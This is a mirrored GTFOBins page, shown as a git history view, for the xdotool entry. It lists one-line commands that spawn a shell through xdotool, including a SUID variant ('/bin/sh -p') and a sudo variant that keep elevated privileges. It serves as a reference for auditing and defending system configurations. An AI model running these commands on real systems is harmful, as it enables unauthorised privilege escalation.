1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-19 02:11:39 +02:00
GTFOBins.github.io/_gtfobins/xdotool.md

11 lines
221 B
Markdown
Raw Normal View History

2022-07-01 09:07:41 +02:00
---
2022-07-02 12:43:40 +02:00
description: This requires a running X server.
2022-07-01 09:07:41 +02:00
functions:
shell:
- code: xdotool exec --sync /bin/sh
suid:
- code: ./xdotool exec --sync /bin/sh -p
sudo:
- code: sudo xdotool exec --sync /bin/sh
---